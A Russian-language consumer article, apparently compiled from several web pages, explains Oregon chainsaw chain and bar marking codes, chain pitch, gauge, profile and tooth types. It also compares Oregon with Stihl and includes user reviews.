405 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Цепи для бензопил орегон маркировка

Цепи для бензопил орегон маркировка

Первые две цифры — серия пильной цепи.
Последние 2 цифры — количество ведущих звеньев.

P — 3/8”, низкий профиль. Базовая цепь с малой отдачей.

VXL — 3/8”, низкий профиль, синий (вороненый) зуб. Цепь с улучшенными рабочими характеристиками.

LPX — Бывают как 3/8” так и ,325”, чизель. Агресивная цепь для профессионалов, с низкой отдачей.

LGX — 3/8”, чизель. Максимально агресивная цепь для профессионалов.

BPX — ,325”, получизельная цепь. Высокопроизводительная цепь для профессионалов, менее чувствительна к ошибкам заточки и сложным условиям резки.

DPX — 3/8”, получизельная цепь. Высокопроизводительная цепь для профессионалов, менее чувствительна к ошибкам заточки и сложным условиям резки.

TXL — ,325”, узкий пропил. Увеличенная скорость пиления и меньший вес.

AC — .404”, Micro-Bit® (Chipper). Профессиональная цепь для тяжелых условий эксплуатации.

Первые две цифры — длина шины в дюймах, третья цифра — ширина паза шины.
Значения: 4 = 1,1 мм, 0 = 1,3 мм, 8 = 1,5 мм, 3 = 1,6мм
Последние 4 знака — хвостовик шины.

SDE — 3/8”, низкий профиль, cерия Standard. Базовая шина.

SXE — 3/8”, низкий профиль, cерия Advance Cut. Полупрофессиональная шина.

SFG — ,325”, cерия Advance Cut. Полупрофессиональная шина.

SFH — 3/8”, cерия Advance Cut. Полупрофессиональная шина.

MLB — ,325”, узкий пропил, cерия Advance Cut. Полупрофессиональная шина.

MLE — 3/8”, узкий пропил, cерия Advance Cut. Полупрофессиональная шина.

PXB — ,325”, cерия Advance Cut. Полупрофессиональная шина.

TXLB — ,325”, cерия SpeedCut. Увеличенная скорость пиления. Идеальны для профессионалов, имеющих дело с большими объемами древесины.

TXLG — ,325”, cерия SpeedCut. Увеличенная скорость пиления. Идеальны для профессионалов, имеющих дело с большими объемами древесины.

VXLG — ,325”, cерия VersaCut. Облегченные профессиональные направляющие шины с самым широким спектром применения.

VXLH — 3/8”, cерия VersaCut. Облегченные профессиональные направляющие шины с самым широким спектром применения.

PXLB — ,325”, cерия ControlCut. Облегченные профессиональные направляющие шины с носовиком уменьшенного радиуса, что гарантирует плавность реза.

Модели бензопил смотри по таблицам ниже. Представлены для бензопилы Partner, Stihl, Husqvarna, Oleo-Mac, Makita, Champion, Echo, Efco, Hitachi, Mcculloch, Shindaiwa, Зид Тайга Урал Дружба.

ТАБЛИЦА РАЗМЕРА ПИЛЬНОЙ ЦЕПИ И ШИНЫ ДЛЯ БЕНЗОПИЛ
HUSQVARNA

Ссылка на нужную цепь

317/321 Electric, 325P5x, 334T, 335XPT, 338XPT

25 см / 10 дюймов

336, 137(e), 142(e), 240e, 235e, 339XP, 340(e), 345(e), 445(e), 350, 450(e), 353, 460, 357XP, 359, 55, 455(e) Rancher

Пильные цепи в своем развитии прошли уже долгий путь усовершенствования и модернизации, начиная с первой трети 20-века, когда появились и стали бурно развиваться конструкции первых бензиновых цепных пил, использовавших их. В это время работавшие на них пильные цепи оснащались бесхитростными прямыми и плокими зубьями, очень схожими с нарезкой зубьев на современных ручных ножовках: восстановление затупившихся зубьев такого профиля было достаточно трудоемким занятием, ведь при этом приходилось учитывать тогдашнее деление зубьев на подрезающие, режущие и скалывающие. все они имели различные режущие углы и были по-разному ориентированы по отношению к направлению движения — отклонялись от него влево, вправо или располагались по центру. Революционным на этом фоне оказалось изобретение в 1947 году Джозефом Коксом пильной цепи «OREGON» универсального назначения с Г-образным контурным углом резания на ее звеньях: она дала применяющим такую схему настолько высокую производительность и простую заточку, что быстро вытеснила с рынка другие варианты пильных цепей, так что теперь практически на любом режущем звене мы найдем серповидный профиль, внедренный изобретением Кокса уже более полувека назад. Но по другим своим параметрам пильные цепи по-прежнему остаются черезвычайно многообразными. Рассмотрим их вкупе с ведущими производителями современных пильных цепей.

Определяя необходимую Вашей бензопиле цепь, можно выделить как особенно важные следующие ее характеристики:

  1. профессиональное назначение цепи;
  2. величина шага и толщина ее пильных звеньев;
  3. высота профили на ее режущих зубах и глубина производимого резания,

1) разница по профессиональному назначению связана с тем, что распиловка в направлении поперек волокон и вдоль волокон древесины технологически очень различаются и вторая из них — гораздо более трудоемка. Основным различием между специализированными для них пильными цепями будут являться углы атаки режущих звеньев на цепях: цепи продольного пиления потребуют более острых углов (от 5 до 15 градусов), на цепях поперечного пиления они будут больше и достигнут 25-30 градусов. Продольная распиловка за счет цепи поперечного пиления приведет к возникновению в ходе работы сильной вибрации, пила будет неустойчива и «агрессивна» в руках оператора, создастся дополнительная нагрузка на ее двигатель. Поперечная же распиловка цепью для продольного пиления грозит сильным понижением производительности.

2) шаг цепи характеризует тип ведущей звездочки на пиле и определяется обычно в долях дюйма по формуле — расстояние между любыми тремя заклепками на пильной цепи, деленное на два. Наиболее распространены пять типов шага для пильной цепи. Наиболее миниатюрный из них в «одну четвертую дюйма (6,35мм)» используется на портативных и одноручных пилах.

Шаги в «325 тысячных дюйма (8,25мм)» и «три восьмых дюйма (9,3мм)» наиболее употребительны в производстве пильных цепей — они составляют более 80% их выпуска в мире.

Шагом в «404 тысячных дюйма (10,26мм)» и шагом в «три четвертых дюйма (19,05мм)» характеризуются цепные пилы с более крупным размером звеньев и повышенной производительностью. Такие шаги встречаются лишь на цепях для мощных валочных пил, а также выпускаются для харвестерного оборудования. Ими традиционно оснащались и пилы российского производства, выделявшиеся всегда повышенными габаритами и весом.

Больший шаг цепи важен с точки зрения ее высокой производительности, но оставляет и более широкий пропил, требует для его производства большей мощности двигателя пилы.

Цепи с небольшим шагом ценны большим количеством зубьев на единицу длины распила, что обеспечивает его плавность и большую чистоту, понижает в работе показатели вибрации.

Величины толщины звена пильной цепи определяются шириной паза на пильной шине. Международное сообщество производителей использует пять их стандартов: 1,1мм (сорок три тысячных дюйма), 1,3мм (пятьдесят тысячных дюйма), 1,5мм (пятьдесят восемь тысячных дюйма), 1,6мм ( шестьдесят три тысячных дюйма), 2мм (восемьдесят тысячных дюйма).

3) По высоте профиля режущих зубов пильные цепи разделяются на низко-профильные и высоко-профильные, поскольку эта их характеристика зависит от высоты у режущей кромки по отношению к плоскости направляющей шины. Низко-профильные пильные цепи идут на укомплектование бензопил любительского назначения, чтобы за счет снижения толщины отделяемой стружки и увеличения площади опоры на режущих звеньях сделать работу этих пил более легкоуправляемой и безопасной. Высоко-профильные пильные цепи рассчитаны на профессиональное использование с целью получения максимальной производительности.

Глубина резания у пильной цепи определяется величиной зазора между ограничителем пропила и верхней гранью режущего зуба, именно она регулирует толщину срезаемой стружки. Самыми массовыми для пильных цепей являются зазоры величиной в 0,635мм (или двадцать пять тысячных дюйма) или в 0,762мм (тридцать тысячных дюйма). Скорость пиления цепью, ее производительность в первую очередь определяется именно глубиной ее резания: чем больше зазор, тем более высокой оказывается производительность. Но зато цепи с небольшими глубинами резания мягче продвигаются в пропиле, имеют низкую степень вибрации и поэтому не «дергаются». Чтобы как-то уравновесить высокие показатели производительности и низкую степень вибрации профессиональные производители цепей часто добиваются этого установкой небольших по глубине режущих зубьев на цепях с большим шагом, а иногда, наоборот, сочетают малый шаг цепи с резцами максимальной глубины.

Обзор цепей Oregon для бензопилы

Изобретателями новой формы режущего зуба чиппер (форма серпа) для бензопил в 1947 году стали основатели фирмы Oregon. Поначалу это была маленькая мастерская с четырьмя сотрудниками, а теперь известная на весь мир фирма с большим ассортиментом продукции.

Что за фирма

К 1951 году фирма вышла на мировой рынок и стала продавать патенты. С 1955 года цепи конструкции Oregon для своих бензопил стала использовать и шведская Husqvarna. Постепенно на использование цепей нового образца перешел весь мир. В России они появились только после 1991 года и получили название в обиходе — «крючковые».

Поначалу фирма Oregon специализировалась исключительно на производстве и улучшении конструкции пильных цепей. Затем начала выпускать собственные бензопилы под этим брендом.

В 2004 году основная часть фирмы вошла в состав глобального концерна Blount Incorporation. Сегодня производством и усовершенствованием пильных цепей конкретно занимается специализированная компания Oregon Cutting Systems, входящая в состав концерна Blount Incorporation.

Качество цепей Oregon

Oregon Cutting Systems остается законодателем в этой области и сегодня. Разумеется, такое положение обязывает производителей держать марку фирмы по двум позициям:

  • качество продукции, сохранение репутации;
  • постоянное улучшение конструкции, внедрение самых последних решений для улучшения эксплуатационных свойств пильных цепей.

Сегодня режущая гарнитура Oregon — самая популярная во всем мире. Это вполне удовлетворительные по качеству и цене изделия для бытового использования, и отличные в более дорогом, профессиональном сегменте.

По цене и качеству с ними может конкурировать Stihl. Хорошее качество цепей от Husqvarna, но оригинальная (не контрафактная) цепь от этого производителя стоит значительно дороже.

Плюсы и минусы цепей Oregon

Основной плюс — это стабильное качество. В цепях Oregon практически не встречается заводского брака, такого как:

  • слишком жесткая клепка, звенья не складываются и цепь клинит;
  • неточное соответствие строгим параметрам по толщине, шагу звена;
  • неподходящие сплавы звеньев (жесткие лопаются, мягкие растягиваются), зубьев (мягкие, быстро тупятся).

Такой брак может быть на небольших производствах, но это не про Oregon.

Все цепи Oregon ровные по качеству, стандартные, с микронной точностью подгонки согласно разрешенным на производстве допускам.

К минусам относится неясность происхождения отдельных групп пильных цепей. Например, потребитель покупает пильную цепь с надписью на коробке Oregon, затем обнаруживает другую честную надпись более мелким шрифтом — Made in China. При этом неизвестно, произведена эта цепь на предприятии Oregon под контролем специалистов, из сплавов и по технологиям фирмы, или некая китайская компания выкупила патент на право выпускать свои изделия под этим брендом.

Как бы то ни было, но цепи для бытовых бензопил под брендом Oregon Made in China имеют ряд недостатков:

  • быстро растягиваются;
  • зубья быстро тупятся и требуют частой заточки, потому быстро стачиваются до негодного состояния;
  • зубья изнашиваются неравномерно.

Последний недостаток критичен, когда требуется заточка на станке. Станок всегда настраивают на заточку по самому маленькому зубу, иначе он останется незаточенным. В итоге все ещё почти целые зубцы стачиваются до размера одного, самого маленького. И всей цепи останется служить совсем недолго. Когда зуб при замере сверху меньше 4 мм, цепь нужно менять.

Но объективно, даже Oregon Made in China стабильнее по качеству, чем цепи от неизвестных производителей.

Особенности конструкции

Все цепи от этого производителя просто отличить от других по надписи oregon на каждом соединительном звене цепи. Также они отличаются технологическими и конструктивными особенностями.

  1. Режущие звенья блестящие, покрыты хромом.
  2. На них хорошо видны специально нанесенные контрольные насечки, которые помогают контролировать точный угол заточки.
  3. Выемки на всех звеньях рассчитаны так, чтобы они равномерно распределяли масло по всей цепи именно туда, где оно нужно в процессе работы.
  4. Все углы и поверхности цепей от Oregon, контактирующие с древесиной, рассчитаны на то, чтобы уменьшить вибрацию и отдачу при работе.

На цепях Oregon применяется два основных вида формы режущих зубьев:

  1. Чиппер (CHIPPER, в переводе «рубящий в щепу»). Если смотреть в профиль, имеет форму серпа. Закругленный сверху.
  2. Чизель (CHISEL, в переводе «долото» или «резец»). Имеет форму цифры 7. Плоский сверху.

На разных моделях цепей возможны варианты, например, зуб полудолото (получиппер), или микрочизель.

Обзор цепей Oregon

На сегодня в свободной продаже можно найти около 100 разных моделей цепей от Oregon. Самые ходовые из них с шагом 0.325, 0.375, толщиной 1,3 и 1,5, с разным количеством зубьев в зависимости от длины. Это те цепи, которые требуются на самые распространенные бытовые модели бензопил.

Также есть редкие цепи. Например, цепи для продольного пиления. Они отличаются другим углом заточки (5-15 градусов вместо 25-35).

Профессиональные цепи Oregon

К разряду профессиональных относятся две модели цепей Oregon — LGX и LPX.

Модель LGX

Применяется на мощных бензопилах с объемом камеры сгорания от 50 до 80 куб. см. Режущие звенья имеют прямоугольный профиль чизельного типа (семерка). Ограничитель глубины реза клиновидной формы. Цепь обеспечивает высокую скорость реза. При эксплуатации выдерживает большие нагрузки.

Модель LPX

По конструкции модель аналогична предыдущей. Но LPX рассчитана на несколько меньшие нагрузки при эксплуатации, чем LPX. Рекомендуются для более легких бензопил с объемом камеры сгорания до 50 куб. см. мощностью до 3 л.с.

Обе вышеуказанные модели мягко входят в древесину, не отскакивают, потому комфортны в работе и безопасны.

Категория «профессиональные» подразумевает, что цепи рассчитаны на непрерывную работу в течение рабочей смены на протяжении долгого времени, в отличие от цепей периодической эксплуатации.

О пильной цепи Oregon 20LPX100R рассказывают в следующем видео, где также сравнивают ее с цепью от Stihl и дают немного информации о производителе:

Цепи Oregon для периодической эксплуатации

По другому определению — это цепи для полупрофессионального использования, средние по сроку эксплуатации между профессиональными и бытовыми.

Модель BPX

По конструкции эту модель можно назвать классической, или обычной. Большинство таких цепей имеют толщину 1,5 мм и шаг 0,325, разной длины и количества звеньев.

Модель SpeedCut (95TXL)

Маркировка SpeedCut означает, что цепь делает узкий пропил. Направляющие сегменты, скользящие по пазу цепи, у них стандартные, 1,3 мм. Но сами звенья уже. И в качестве режущего элемента стоит микро-чизель, то есть зуб обычной формы чизель (семерка), но меньшей ширины. Тонкий пропил снижает нагрузку на бензопилу, повышает скорость реза. Цепь хорошо передает масло по всей длине за счет продуманной формы выемок на звеньях.

В результате хорошо смазывается, что компенсирует более тонкое сечение по сроку службы. Рекомендуется использовать на бензопилах с объемом камеры сгорания до 55 куб. см.

Модель DPX/DX

Отличается формой резца — получизель. Предназначена для распиловки проблемной древесины — плотной, пересохшей, суковатой и загрязненной. Форма зуба несколько снижает скорость реза, но делает цепь более неприхотливой в работе и заточке. Легко правится напильником. Даже без строгого соблюдения углов заточки полностью восстанавливает способность пилить.

Цепи Oregon для бытовой эксплуатации

Кроме широкого выбора пильных цепей обычной (классической) конструкции, сегодня Oregon предлагает несколько типов новейших и более совершенных моделей.

Модель 91VXL

Это низкопрофильная цепь для бытовых бензопил. Высота режущего зуба снижена. В результате цепь захватывает меньше древесины. Это снижает скорость реза, но меньше нагружает бензопилу. Древесина пилится более плавно и мягко, уменьшается вибрация и возможность отскоков.

Модель 91VXL Multi-cut

Цепь с маркировкой Multi-cut означает, что у этой модели режущие элементы повышенной прочности. Цепь может пилить мерзлую древесину, не тупится от льда и снега. Пилит твердые породы дерева, суковатые комли, пни. При пилении обычной древесины заточка требуется примерно в 2 раза реже, чем на обычной цепи.

Модель 90PX

Модель 90PX относится к серии моделей Micro-lite. Это узкие цепи, которые обеспечивают небывалую скорость реза за счет малого сопротивления древесины. В отличие от узкопрофильных цепей, например, SpeedCut 95TXL, у Micro-lite сужена не только режущая часть, но и вся цепь. Толщина направляющих сегментов и паза шины под них — 1,1 мм.

До того минимальным общепринятым стандартом была толщина 1,3 мм. Эти цепи вполне можно ставить на многие ходовые модели бытовых бензопил, но в комплекте с шиной с толщиной паза, соответственно — 1,1 мм.

Модель 91P

Отличается универсальностью использования. Уникальная форма резца получизель — получиппер позволяет одинаково легко пилить строительную древесину и обрезать сады.

Модель 91 POWERSHARP

Система POWERSHARP — новое слово в этой области. Шины и цепи этой серии позволяют затачивать цепь в процессе работы, благодаря встроенному в шину приспособлению с абразивом.

Oregon или Stihl: что выбрать и почему

На эту тему идут постоянные споры среди пользователей бензопил.

Цепи Oregon Made in China не рассматриваются. Они какого-то другого типа.

Бесспорно общепризнанного лидера нет, потому что режущая гарнитура Oregon и Stihl по качеству примерно одинакового уровня. Разница есть, но на уровне нюансов, не всегда заметных в процессе эксплуатации:

  1. Цепи Oregon быстрее растягиваются, чем Stihl, потому что сделаны из более мягких сплавов, но звенья никогда не лопаются. Причем сильнее растягиваются летом, в жару. Сказывается нагрев до более высокой температуры, чем зимой.
  2. Цепи Stihl сделаны из более жестких сплавов, меньше тянутся, но звенья иногда лопаются.
  3. Режущие зубья Oregon легче точатся. Некоторые ставят это в плюс. Но это минус — легче точатся — быстрее тупятся, потому что более мягкий сплав.
  4. Режущие зубья Stihl труднее точатся, но дольше не требуют заточки.
  5. На бензопилах Stihl рекомендуется использовать пильную гарнитуру этой же фирмы, аналогично и на бензопилах Oregon идеально подходят родные цепи.

По другим показателям нельзя сравнивать все цепи оптом от Oregon и Stihl. У каждого производителя есть большая разница по конкретным моделям.

Отзывы о цепях Oregon

В ознакомительных целях предлагаем вашему вниманию несколько отзывов о цепях Oregon оставленных посетителями нашего сайта.

Отзыв от Михаила, Калуга. Орегоновские цепи — хорошие, когда не китайские, а производства США. Пилю односельчанам дрова, работы всегда много, круглый год. Использую эти цепи. Конечно, хотелось бы вечную цепь и чтобы совсем не тупилась, но таких нет. Потому эти устраивают.

Отзыв от Сергея, Курск. Специально на пробу купил две цепи, Oregon и Stihl. Орегоновская быстрее растягивается. Звенья из более мягкого металла. Stihl тянется меньше, металл более жесткий, каленый. Но в этом плюс и минус — в итоге на цепи Stihl одно звено лопнуло. А мягкий металл лопнуть не может, он растягивается.

Заключение

Как видим, Oregon запускает в производство новые типы и конструкции цепей, технологии заточки, сплавы и системы смазки. Это говорит о том, что компания по-прежнему не намерена уступать лидирующих позиций в этой области.

Маркировка цепей для бензопил

В некоторых ситуациях у обладателей бензопил может возникать некая путаница в понимании всех обозначений маркировки цепей для этих инструментов. По итогу это приводить к неудачным покупкам. Выбор бензопил зачастую определяется всего лишь несколькими основными критериями, одним из которых является шаг цепи. Данный показатель помогает выделить будущие возможности инструмента, в том числе его скорость распила, а также по нормам должен соответствовать уровню мощности двигателя. Как же маркируются цепи? Давайте разберёмся!

Шаг и его размеры

Шаг – это промежуточное расстояние между тремя заклёпками, которые располагаются рядом. Для правильного вычисления шага цепи следует произвести замер расстояния между осями трёх заклёпок, размещённых вблизи друг друга. В виде формулы это выглядит следующим образом:

L=S/2

Где, L – это величины длины шага, которая в бензопилах характеризует степень удалённости двух зубьев по отношению друг к другу;

S – значение промежутка между двумя крайними заклёпками из трёх.

Величина шага может быть также равна длине расстояния между двумя соседними хвостовиками.

Закономерность: чем больше будет расстояние между режущими зубцами, тем глубже они будут входить в распиливаемый материал

Путём увеличения размера шага цепи становится возможным повышение производительности бензопилы. Однако, в подобном случае изменяется степень прилагаемого усилия для осуществления вращения приводной звёздочки. И чем выше шаг цепи, тем большей должна быть мощность двигателей и больше физических сил затрачивается для её протяжки при распиловке материалов.

Шаг цепи бензопилы. Таблица

С учётом величины шага, на сегодняшний момент цепи разделяются не несколько подтипов:

Как видно из таблицы шаг цепи обозначается как обычное число (3/4) и десятичное – «0,375». Подобное разделение вызвано схожестью десятичных значений – «0,325» и «0,375», поскольку разница в одну цифру создавала путаницу при подборе пилы. Поэтому в своё время было принято решение об установлении двух разных обозначений: десятичными и обычными дробями.

Шаг выштамповывается в области специального ограничителя глубины распила на каждом зубе.

К плюсам цепей с большим шагом можно отнести:

  • высокий уровень производительности за счёт широкого пропила;
  • возможность выполнения сложных работ (валка крупных деревьев).

Но следует учесть, что широкий пропил требует использования более мощного двигателя, что в свою очередь значительно увеличивает сопротивление.

Преимуществами цепей с малым шагом являются:

  • низкий уровень вибрации;
  • плавные движения при пропиле;
  • чистота реза.

Достигаются преимущества за счёт большого количества зубьев и малого расстояния между ними.

Вся известная классификация цепей основывается на особенностях их маркировки в зависимости от шага, который предназначен для определённых потребностей и производится под конкретную мощность электрооборудования. Для лучшего понимания каждого типа шага, их следует рассмотреть по отдельности.

Основные параметры цепей

Нанесение маркировка цепи предполагает наличие следующих параметров:

  1. Шаг:
  • «0,325» – самый распространённый и минимальный размер шага, который используется в полупрофессиональных и бытовых бензопилах с малыми мощностями. Стандартная величина мощности под такой шаг колеблется в пределах от «0,325» до «3л.с.», но не выше «3,5л.с». При работе с таким типом цепи распил проходит более плавно, комфортно, без «порывов» обрабатываемых изделий.
  • «0,375» («3/8») – наносится на бензопилы с мощностью в «4л.с». Такая цепь применяется при распиловке древесины средней и малой толщины.

От значения шага зависит точность и качество создаваемого пропила. В случаях отсутствия важности достижения высокого качества при работе бензопилой иногда особое значение имеет точность реза. Для этого необходимо обязательно учитывать зависимость шага на роспуск древесины по заранее нанесённым разметкам.

  1. Толщина ведущих звеньев (хвостиков). При работе бензопилы на её цепь приходится большая часть всех нагрузок. Учитывая это, ещё одной главной характеристикой работы пилы является толщина элементов звена, которое входит в пазы шины. Этот параметр также определяет общую толщину скрепляющих звеньев, которая измеряется с помощью обычного штангенциркуля. К стандартным значениям толщины относят:

  • «1,1 мм» («0,043») и «1,3 мм» («0,05») – используются при производстве цепей начального уровня, которые предназначены для осуществления незначительных объёмов работ. Зачастую при таких значениях толщины звеньев длина шага цепи может составлять «0,325», что предполагает наличие невысоких нагрузок и щадящего режима работы. Поэтому их используют в бытовых и полупрофессиональных аппаратах;
  • «1,5 мм» («0,058») – самая распространённая величина толщины на рынке бензопил и комплектующим к ним. Такое значение способно обеспечить безопасную работу при величине шага в «3/8». Цепь с толщиной 1,5мм не предназначена для распила профессионального уровня;
  • «1,6 мм» (0,063) и «2,0 мм» (0,08) – предназначаются для проведения самых сложных работ. Металлом при изготовлении таких цепей служит сталь особых марок, а в конструкцию закладываются характеристики повышенной прочности.

Чем большей будет толщина звена и шире паз шины, тем высококачественнее считается бензопила, поскольку она способна выдерживать большие нагрузки.

  1. Глубина реза – является отличительной особенностью производимых цепей и характеризуется высотой профиля режущих зубьев. Измеряется она промежутком между ограничителями и режущей верхней кромкой. На рынке могут быть представлены, как высокопрофильные (0,762 мм), так и низкопрофильные (0,635 мм) виды цепных изделий.


Чем больше высота профиля, тем выше вход в материал (глубина) и скорость распиливания

Высокопрофильные цепи устанавливаются на бензопилы с повышенными мощностями двигателя. Информация о высоте профиля, как правило, прописывается в характеристике к инструменту.

Профиль влияет на возникновение вибраций, вызывающие в последствии изношенность привода либо проблемы при удержании инструмента в руках. При этом чем выше режущие части, тем сильнее будет степень вибрации.

Бытовые типы бензопил оснащаются низким профилем. В полупрофессиональных устройствах могут сочетаться разные варианты типов цепей. Однако в большинстве случаев придерживаются принципа:

В цепи с большим шагом устанавливают низкий профиль, а при шаге «0,325» — высокий

Такими вариациями повышается скорость распила не за счёт шага, а благодаря изменению глубины или высота профиля. Хотя в профессиональных инструментах акцент делают на повышение шага, объясняя это тем, что бензопила становится более управляемой.

  1. Геометрия режущих зубьев – профиль может быть двух основных типов:
  • чипперный (в народе «серп») – имеет серповидную форму и отличается высокой производительностью. При эксплуатации легче затачивается и не требует соблюдения чётких углов заточки. Недостаток: риск возникновения высоких нагрузок и ухудшения режущих характеристик;
  • чизельный (в народе «семёрка») – имеет рабочую поверхность прямой формы в виде цифры «7». Применяются в цепях с шагом «0,404» или «3/8» на профессиональных пилах. Главный недостаток чизельных звеньев – сложность заточки режущих элементов и чувствительность к воздействию грязи.

  1. Количество режущих зубьев – определяется как соотношение числа зубьев к количеству направляющих в шине. В бензопилах хорошего производства должны сочетаться два направляющих звена в режущей части инструмента.
  2. Тип заточки звеньев – напрямую зависит от типа будущих работ. Классические виды бензопил применяются в большинстве своём для поперечного распила деревьев и редко используются для продольного распила. С учётом сопротивления дерева в обоих случаях в цепях может использоваться разный угол размещения звеньев. На строительных прилавках сейчас можно встретить цепи со следующими типами режущих звеньев:
  • продольный тип цепи – предполагает распил дерева вдоль его волокон. Угол реза достигает 5-15 градусов.
  • поперечный тип – распил ведётся поперёк. Угол реза в цепях составляет 25-35 градусов.

  1. Длина цепи – зависит от параметров и технических характеристик самой бензопилы: мощности, габаритов и др. При стандартном или нормированном натяжении цепи её длина чаще всего указывается в паспорте.
  2. Порядок следования звеньев – последовательность расположения звеньев может быть разной:
  • стандартный – на каждое режущее звено в цепи приходится два ведущих звена;
  • с полупропуском – каждое третье по размещению звено в цепи заменено на так называемое соединительное;
  • с пропуском – в местах расположения каждого второго звена для реза устанавливается соединительное.

Зачем нужен пропуск звеньев в цепи? В самих цепях наиболее ценным является качество режущих звеньев, поскольку они изготавливаются по особым технологиям и имеют большую стоимость в отличие от соединительных звеньев. При невозможности укоротить цепь единственным вариантом удешевления стоимости цепи становится пропуск режущих элементов. В работе цепи с пропусками звеньев показывают сниженную производительность и быстро изнашиваются.

В целом, желая приобрести инструмент для распила древесины с максимальной эффективностью, не поленитесь дополнительно изучить маркировку цепей для бензопил, указываемую также в инструкциях к инструменту.

Цепь Oregon для бензопилы: типы и отзывы

Пильная цепь Орегон для бензопилы позволяет использовать эксплуатационные возможности бензомоторных версий и электрических аналогов любого класса с максимальной эффективностью. При этом ее цена по карману и профессионалу, и обычному домовладельцу.

Эксплуатация орегоновского цепного ассортимента предполагает:

  • применение качественных цепных масел;
  • исправность и правильную регулировку маслонасосов, систем смазки пильного оборудования;
  • уровень эксплуатационных нагрузок, не превышающих обозначенных производителем параметров.

Краткий обзор пильных цепей Орегон

Действующий ассортимент включает в себя более 10 моделей разного назначения. Приведенные данные помогут сориентироваться в характеристиках модельного ряда и выбрать фирменную пильную цепь соответствующую особенностям и уровню сложности последующих работ.

LGX и LPX

Пильные цепи профессионального класса эффективно работают с шинами PRO-LITE® и PRO-AM®. Это лучшие варианты для пил с мощным приводом, используемых в масштабных лесозаготовительных и строительных работах.

  • Конструкционные особенности модели LGX — высокопроизводительные режущие звенья чизельного типа с прямоугольными боковинами и ограничители глубины пропила клиновидной.
  • Изделие рекомендовано для работы с пилами профкатегории с объемом цилиндра 50-80 см3. Цепь LPX ориентирована на комплектацию пил небольшого литража, в пределах 38-50 см 3 и меньший уровень эксплуатационных нагрузок.

Обе модели обеспечивают безударный вход в пропил, чем исключается возможность образования травмоопасных ситуаций.

Пильные цепи BPX, SpeedCut™ (95TXL) и DPX/DX

Модельный ряд предназначен для эксплуатации средней интенсивности.

  • Режущие элементы Micro-Chisel® имеют малый радиус закругления, который наиболее удобен для ручной и машинной заточки. Сочетание цепи и направляющей шины PRO-AM® обеспечивает полноценную подачу цепного масла в шарнирные соединения.
  • Цепь с узким профилем марки SpeedCut™ отличается небольшой шириной пропила и менее интенсивными воздействиями натягу силового привода. Модель рассчитана на эксплуатацию с пилами среднего мощностного диапазона. Основной приоритет – высокая скорость работы.
  • DPX/DX — модель с резцами получизельного типа ориентирована на работу с проблемной древесиной. Цепь в меньшей степени чувствительна к качеству ручной заточки.

При проектировании цепи упор сделан на длительную эксплуатацию и экономию расходных материалов. Цепи DPX/DX эффективно работают с полу- и профессиональными пилами с объемом цилиндра двигателя от 50 до 100 см3.

Цепи Орегон 91VXL, 91VXL Multi-cut™ и 90PX

Данная серия предназначена для комплектации направляющих шин PRO-AM® 91DOUBLE и GUARD®.

  • Пильная цепь 91VXL — универсальный вариант для бытового пользования. Существенное преимущество получизельных режущих звеньев — неприхотливость к качеству ручной заточки.
  • Пила с цепью серии 91VXL успешно справляется с широким спектром строительных и частно-хозяйственных работ.

Характерная особенность серии 91VXL Multi-cut™ наличие особо прочного хромового покрытия, определяющего повышенную износостойкость цепи при работе в абразивной среде.

  • Технология MultiCut™ позволяет увеличить срок службы режущих кромок пильных звеньев при распиловке бревен, загрязненных после перемещения волоком, шпал и других проблемных материалов.
  • Удачная во всех отношениях низкопрофильная пильная цепь нового поколения 90PX совмещает в себе высокую производительность и комфорт сложных распиловочных работ, меньший уровень нагрузки на силовой агрегат, продление реального ресурса инструмента в целом.

Пильные цепи нового поколения 91P и 91 POWERSHARP®

Модельный ряд цепей Орегон пополнился новыми разработками бытового класса.

  • В конструкции изделия OREGON® 91P задействованы пильные звенья фасочного типа, совмещающие в себе преимущества чизельных и однотипных получизельных резцов.
  • Фирменная шина и цепь Oregon модели 91P является оптимальным вариантом комплектации малолитражных пил, с умеренным объемом бензомоторного привода.

Цепь OREGON® 91 PowerSharp® разработана с привлечением новых конструкторских решений и современных производственных технологий. Цепь отличается от предыдущих аналогов удлиненным ресурсом и до максимума упрощенной ручной заточкой.

Преимущества и недостатки

По заключению независимых экспертов существенные конструкционные недостатки в модельном брендовом ассортименте отсутствуют.

Большая часть негативных потребительских отзывов — это последствия неграмотной эксплуатации, а также:

  • экономии средств на приобретении дешевых китайских подделок;
  • применения смазочных суррогатов;
  • превышения уровня допустимых нагрузок.

Отзывы владельцев

По окрестным деревням подрабатываю распиловкой дров и свалом древесного сухостоя. Уважаю орегоновские пильные цепи за выносливость и неприхотливость в заточке, поэтому с учетом постоянного роста цен купил целую бухту и станок для заточки цепей, обошлось в неполных 14000 рублей. Себя обеспечил на несколько лет вперед, также при случае выручаю друзей и знакомых.
Гарик

Купил китайскую бензопилу с цепью Орегон. Сам инструмент нуждается в доработке. Что касается гарнитуры, продукция фирменная, изнашивается в меру. Даже после ручной заточки цепи производительность распиловки восстанавливается практически полностью.
Сергей Николаевич

Выбор цепи для бензопилы и характеристики цепей

Правильный выбор новой цепи

Выбор новой цепи для пилы. Как правильно выбрать?

В нашу компанию достаточно часто обращаются клиенты с просьбой подобрать цепь для цепной пилы, бензиновой или электрической. При этом, добрая половина клиентов не знает параметры своей пилы и соответственно цепи. Некоторые клиенты приносят пилу с собой, чтобы мы правильно подобрали цепь.

Основные параметры пильной цепи
Основные размеры пильной цепи, далее по тексту цепь, следующие:
• Длина цепи, выраженная в сантиметрах или/и дюймах;
• Шаг цепи, в дюймах;
• Толщина приводного (ведущего) звена, в миллиметрах;
• Число звеньев у цепи.

Определение длины цепи
Длина цепи определяется подсчетом количества приводных (внутренних) звеньев цепи. Важно:
режущие звенья не определяют длину цепи (не считайте их).
одна и та же пила может комплектоваться разными по длине шинами и соответственно нужны разные цепи по длине.
длина направляющей шины не определяет точную длину цепи (например, на пиле с шиной 16″ (40 см) может быть установлена цепь длиной 55, или 56, или 57 звеньев, зависит от механизма натяжки цепи конкретной модели пилы).
• вам не подойдет цепь длиной примерно 55-57 звеньев, подойдет только определенный размер рекомендованный производителем пилы.

Определение шага цепи
Шаг цепи определяется параметрами приводной и ведомой звездочки. Приводная звездочка закреплена на пиле и приводит цепь в движение. Ведомая звездочка расположена на конце шины и в первую очередь служит для направления движения цепи.
Шаг цепи S – это расстояние L между тремя заклёпками, которые располагаются рядом, деленное на 2, либо половина расстояния между «остриями» приводных звеньев цепи.

